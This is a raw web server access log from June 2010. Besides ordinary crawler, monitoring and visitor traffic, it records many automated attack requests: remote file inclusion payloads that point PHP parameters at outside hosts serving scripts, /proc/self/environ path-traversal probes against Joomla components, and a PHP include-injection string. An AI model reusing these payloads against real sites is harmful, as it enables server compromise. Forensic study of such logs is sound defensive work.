64.91.250.11 - - [23/Jun/2010:07:32:46 -0400] "GET /logs/error_log.Q110010900%20%20/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Jun/2010:07:32:59 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:32:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:32:59 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [23/Jun/2010:07:33:03 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
67.225.141.62 - - [23/Jun/2010:07:33:07 -0400] "GET //linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:07 -0400] "GET /logs//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:07 -0400] "GET /logs/error_log.Q110032200//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:07 -0400] "GET //linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:07 -0400] "GET /logs/error_log.Q110032200//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:07 -0400] "GET /logs/access_log.Q110032200//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:07 -0400] "GET /logs//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:07 -0400] "GET /logs/access_log.Q110032200//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:07 -0400] "GET /logs/access_log.Q110032200%20%20//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
74.9.205.39 - - [23/Jun/2010:07:33:13 -0400] "GET /logs/error_log.Q109101400//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 272 "-" "libwww-perl/5.805"
67.225.141.62 - - [23/Jun/2010:07:33:19 -0400] "GET /logs/error_log.Q110032200%20%20//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:31 -0400] "GET /logs/access_log.Q110032200%20%20//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:32 -0400] "GET /logs/access_log.Q110032200%20%20//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
174.121.166.146 - - [23/Jun/2010:07:33:34 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
67.225.141.62 - - [23/Jun/2010:07:33:48 -0400] "GET /logs/error_log.Q110032200%20%20//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.225.141.62 - - [23/Jun/2010:07:33:48 -0400] "GET /logs/error_log.Q110032200%20%20//linkadmin.php?page=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
67.15.152.183 - - [23/Jun/2010:07:34:42 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
74.55.238.226 - - [23/Jun/2010:07:34:43 -0400] "GET /logs/access_log.Q109100200/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.apbs.pl/cache/fx1.txt??? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
174.121.166.146 - - [23/Jun/2010:07:34:58 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
67.15.152.183 - - [23/Jun/2010:07:34:59 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
123.125.66.67 - - [23/Jun/2010:07:35:02 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
74.55.240.242 - - [23/Jun/2010:07:35:31 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:35:31 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:35:36 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:35:44 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:35:44 -0400] "GET /logs/access_log.Q109070300//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:35:44 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.121.166.146 - - [23/Jun/2010:07:35:48 -0400] "GET /logs/access_log.Q109070300/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.166.146 - - [23/Jun/2010:07:35:48 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.121.166.146 - - [23/Jun/2010:07:35:48 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
174.121.166.146 - - [23/Jun/2010:07:35:55 -0400] "GET /logs/access_log.Q109081500/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
67.15.152.183 - - [23/Jun/2010:07:35:57 -0400] "GET /logs/access_log.Q110061300/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:07:35:57 -0400] "GET /index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
67.15.152.183 - - [23/Jun/2010:07:35:57 -0400] "GET /logs/index.php?option=com_svmap&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
74.9.205.39 - - [23/Jun/2010:07:35:58 -0400] "GET /logs/access_log.Q109061100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.805"
74.9.205.39 - - [23/Jun/2010:07:35:58 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
74.9.205.39 - - [23/Jun/2010:07:35:58 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.chilli.ch/rezepte/momok.txt?? HTTP/1.1" 404 254 "-" "libwww-perl/5.805"
220.181.7.91 - - [23/Jun/2010:07:36:16 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
184.73.59.184 - - [23/Jun/2010:07:36:25 -0400] "GET /logs/access_log.Q109112100 HTTP/1.1" 200 1979338 "-" "Mozilla/5.0 (compatible; spbot/2.0.4; +http://www.seoprofiler.com/bot )"
74.55.240.242 - - [23/Jun/2010:07:36:36 -0400] "GET //ashnews.php?pathtoashnews=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:36:36 -0400] "GET /logs/access_log.Q110032000//ashnews.php?pathtoashnews=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:36:36 -0400] "GET /logs//ashnews.php?pathtoashnews=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:36:36 -0400] "GET /logs/access_log.Q109122400//ashnews.php?pathtoashnews=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:36:40 -0400] "GET /logs//ashnews.php?pathtoashnews=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:36:40 -0400] "GET //ashnews.php?pathtoashnews=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
74.55.240.242 - - [23/Jun/2010:07:36:40 -0400] "GET /logs/access_log.Q109122400//ashnews.php?pathtoashnews=http://iyut.fileave.com/ID1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Jun/2010:07:36:55 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:36:55 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:36:55 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
67.148.93.62 - - [23/Jun/2010:07:37:22 -0400] "GET /logs//index.php?option=com_janews&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.813"
95.108.245.251 - - [23/Jun/2010:07:37:23 -0400] "GET /logs/access_log.Q109121900 HTTP/1.1" 304 - "-" "Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.209 - - [23/Jun/2010:07:37:43 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L010BDD521F32640007BC08P+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
64.91.250.11 - - [23/Jun/2010:07:38:03 -0400] "GET /logs/access_log.Q109111400/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
84.45.129.208 - - [23/Jun/2010:07:38:04 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.45.129.208 - - [23/Jun/2010:07:38:04 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.45.129.208 - - [23/Jun/2010:07:38:05 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
84.45.129.208 - - [23/Jun/2010:07:38:05 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.5; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.121.166.146 - - [23/Jun/2010:07:38:36 -0400] "GET /logs/access_log.Q110060700/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.810"
174.121.166.146 - - [23/Jun/2010:07:38:36 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
174.121.166.146 - - [23/Jun/2010:07:38:36 -0400] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 212 "-" "libwww-perl/5.810"
64.91.250.11 - - [23/Jun/2010:07:38:45 -0400] "GET /logs/access_log.Q109111400/mantis/login_page.php?g_meta_include_file=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:38:56 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:38:56 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:38:56 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:38:58 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:38:58 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:38:58 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:39:31 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:39:31 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:39:31 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:39:31 -0400] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:39:31 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:39:31 -0400] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:39:32 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:39:32 -0400] "GET /logs/access_log.Q109091800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
172.16.1.180 - - [23/Jun/2010:07:39:44 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:39:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:39:44 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
64.91.250.11 - - [23/Jun/2010:07:39:48 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:07:39:52 -0400] "GET //home.php?pg=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:07:39:52 -0400] "GET /logs/access_log.Q110042900%20%20//home.php?pg=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:07:39:52 -0400] "GET /logs//home.php?pg=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
149.31.6.24 - - [23/Jun/2010:07:39:52 -0400] "GET /logs/error_log.Q110042900%20%20//home.php?pg=http://www.sinhhocvietnam.com/data/1???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:39:54 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
64.8.98.179 - - [23/Jun/2010:07:39:55 -0400] "GET /logs/access_log.Q109102900//include/footer.php?_path[counter]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:39:55 -0400] "GET //include/footer.php?_path[counter]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:39:55 -0400] "GET /logs//include/footer.php?_path[counter]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
64.8.98.179 - - [23/Jun/2010:07:40:35 -0400] "GET /logs/error_log.Q109112000//include/footer.php?_path[counter]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
172.16.1.180 - - [23/Jun/2010:07:41:04 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:41:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:41:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
209.59.12.99 - - [23/Jun/2010:07:41:11 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.202.38 - - [23/Jun/2010:07:41:37 -0400] "GET /logs/access_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:07:41:37 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:07:41:37 -0400] "GET /logs//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.831"
64.8.98.179 - - [23/Jun/2010:07:41:37 -0400] "GET //include/footer.php?_path[counter]=http://www.prietenii.ger.ro/forum/momok.txt?? HTTP/1.1" 404 217 "-" "libwww-perl/5.79"
174.121.217.109 - - [23/Jun/2010:07:41:40 -0400] "GET /index.php?option=com_communitypolls&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.810"
94.23.7.24 - - [23/Jun/2010:07:42:00 -0400] "GET /logs/error_log.Q110051400//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:42:00 -0400] "GET //index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:42:00 -0400] "GET /logs//index2.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
172.16.1.180 - - [23/Jun/2010:07:42:04 -0400] "OPTIONS / HTTP/1.1" 200 - "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:42:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
172.16.1.180 - - [23/Jun/2010:07:42:04 -0400] "PROPFIND /itemimages HTTP/1.1" 405 236 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600"
94.23.7.24 - - [23/Jun/2010:07:42:20 -0400] "GET /logs/access_log.Q109070700//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 236 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:42:20 -0400] "GET //index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 209 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:42:21 -0400] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 214 "-" "libwww-perl/5.803"
209.59.202.38 - - [23/Jun/2010:07:42:27 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
209.59.202.38 - - [23/Jun/2010:07:42:27 -0400] "GET //index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
64.91.250.11 - - [23/Jun/2010:07:42:36 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:36 -0400] "GET /logs/access_log.Q109102200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:36 -0400] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:36 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 55561 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:39 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 55561 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:39 -0400] "GET /logs/access_log.Q109102200////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:39 -0400] "GET /logs/access_log.Q109102300////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:46 -0400] "GET /logs/access_log.Q109102200%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:46 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:46 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:46 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 55561 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:46 -0400] "GET /logs/access_log.Q109102200%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
64.91.250.11 - - [23/Jun/2010:07:42:46 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 200 55561 "-" "Mozilla/5.0"
94.23.7.24 - - [23/Jun/2010:07:42:52 -0400] "GET /logs/access_log.Q109070700//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:42:53 -0400] "GET //index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.803"
94.23.7.24 - - [23/Jun/2010:07:42:53 -0400] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 213 "-" "libwww-perl/5.803"
64.91.250.11 - - [23/Jun/2010:07:42:56 -0400] "GET /logs/access_log.Q109102300%20%20////?_SERVER[DOCUMENT_ROOT]=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
